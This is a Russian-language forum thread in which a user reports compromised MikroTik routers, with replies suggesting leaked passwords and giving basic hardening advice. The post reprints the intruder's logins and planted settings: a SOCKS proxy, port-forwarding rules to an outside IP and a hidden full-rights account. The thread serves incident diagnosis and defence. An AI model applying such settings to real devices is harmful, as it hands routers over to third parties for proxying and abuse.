Взлом микротик.

Тема в разделе "Общий форум", создана пользователем Sergey_S, 23 сен 2018.

  1. Sergey_S

    Sergey_S Новый участник

    Добрый день.

    На нескольких устройствах устройствах нашел следы взлома.

    выглядит в логах так
    # sep/23/2018 9: 7:55 by RouterOS 6.43
    sep/18 22:00:55 system,error,critical login failure for user dummy_user from 5.101.6.170 via api
    sep/18 22:00:55 system,info,account user administrator logged in from 5.101.6.170 via api
    sep/18 22:00:55 system,info socks acl entry removed by administrator
    sep/18 22:00:55 system,info socks config changed by administrator
    sep/18 22:00:55 system,info socks acl entry added by administrator

    sep/19 07:37:39 system,error,critical login failure for user dummy_user from 5.101.6.170 via api
    sep/19 07:37:39 system,info,account user administrator logged in from 5.101.6.170 via api
    sep/19 07:37:47 system,info socks acl entry removed by administrator
    sep/19 07:37:47 system,info socks config changed by administrator
    sep/19 07:37:47 system,info socks acl entry added by administrator
    sep/19 07:40:33 system,info,account user administrator logged out from 5.101.6.170 via api
    sep/19 07:40:40 system,error,critical login failure for user dummy_user from 5.101.6.170 via api
    sep/19 07:40:40 system,info,account user administrator logged in from 5.101.6.170 via api
    sep/19 07:40:48 system,info socks acl entry removed by administrator
    sep/19 07:40:48 system,info socks config changed by administrator
    sep/19 07:40:48 system,info socks acl entry added by administrator

    Сервисы api вроде были отключены, но это не точно.

    С точки зрения конфигурации появилось несколько дополнительных настроек
    # sep/23/2018 09:09:03 by RouterOS 6.43
    #
    # model = RouterBOARD 952Ui-5ac2nD

    /ip firewall filter
    add action=accept chain=forward connection-nat-state=dstnat
    /ip firewall nat
    add action=dst-nat chain=dstnat dst-port=3333 protocol=tcp to-addresses=\
    92.39.241.167 to-ports=3333
    add action=dst-nat chain=dstnat dst-port=8888 protocol=tcp to-addresses=\
    92.39.241.167 to-ports=8888
    add action=dst-nat chain=dstnat dst-port=14444 protocol=tcp to-addresses=\
    92.39.241.167 to-ports=4444
    add action=dst-nat chain=dstnat dst-port=8008 protocol=tcp to-addresses=\
    92.39.241.167 to-ports=4444
    add action=dst-nat chain=dstnat dst-port=4444 protocol=tcp to-addresses=\
    92.39.241.167 to-ports=4444
    add action=dst-nat chain=dstnat dst-port=9999 protocol=tcp to-addresses=\
    92.39.241.167 to-ports=4444
    /ip service
    set api port=8778
    set api-ssl disabled=yes port=63000
    /ip smb shares
    set [ find default=yes ] directory=/pub
    /ip socks
    set enabled=yes max-connections=500 port=3629
    /ip socks access
    add action=deny src-address=!5.96.0.0/12
    /system routerboard settings
    set silent-boot=no


    Также появился пользователь GOD с правами full.

    На одном из микротиков правил нат было 170 =) Пароль пользователя не простой.

    Вообщем кто-то сделал из моего микротика анонимный прокси. Это какая то бага или кривой файрвол?
     
  2. Kato

    Kato Участник

    об этом нужно писать производителю
     
  3. amv

    amv Участник

    Это не бага и не кривой фаервол, просто твой пароль утек до того как ты обновил прошивку, 1.Доступ с определенно ip 2.Меняем пасс 3.Меняем порты на нестондартные winbox, web и выключи сервисы которые не используеш.
     
  4. Sergey_S

    Sergey_S Новый участник

    Кстати пользователь был найден на 2-х из 3-х устройств.
     
  5. amv

    amv Участник

    пароли утекли.
     
  6. Sergey_S

    Sergey_S Новый участник

    Версия понятная, спасибо. Но для получения доступа надо было бы чтоб еще и учетка утекла. К слову пароли и учетки на устройствах не одинаковые
     
  7. amv

    amv Участник

    что за учетка??? где вы об этом написали?
     
  8. Sergey_S

    Sergey_S Новый участник

    Это то, что обычно настраивают в system->users.

    а что об этом писать?
     
  9. amv

    amv Участник

    мы про него и говорим вот отуда пас и утек
     
  10. amv

    amv Участник

    Причом все узеры которые там есть необходимо пасс сменить.
     
  11. Sergey_S

    Sergey_S Новый участник

    "Нужно быть до конца последовательным в своих заблуждениях " (С).

    Я вас услышал, спасибо. Можно дальше не развивать тему про утечку учетных записей с паролями.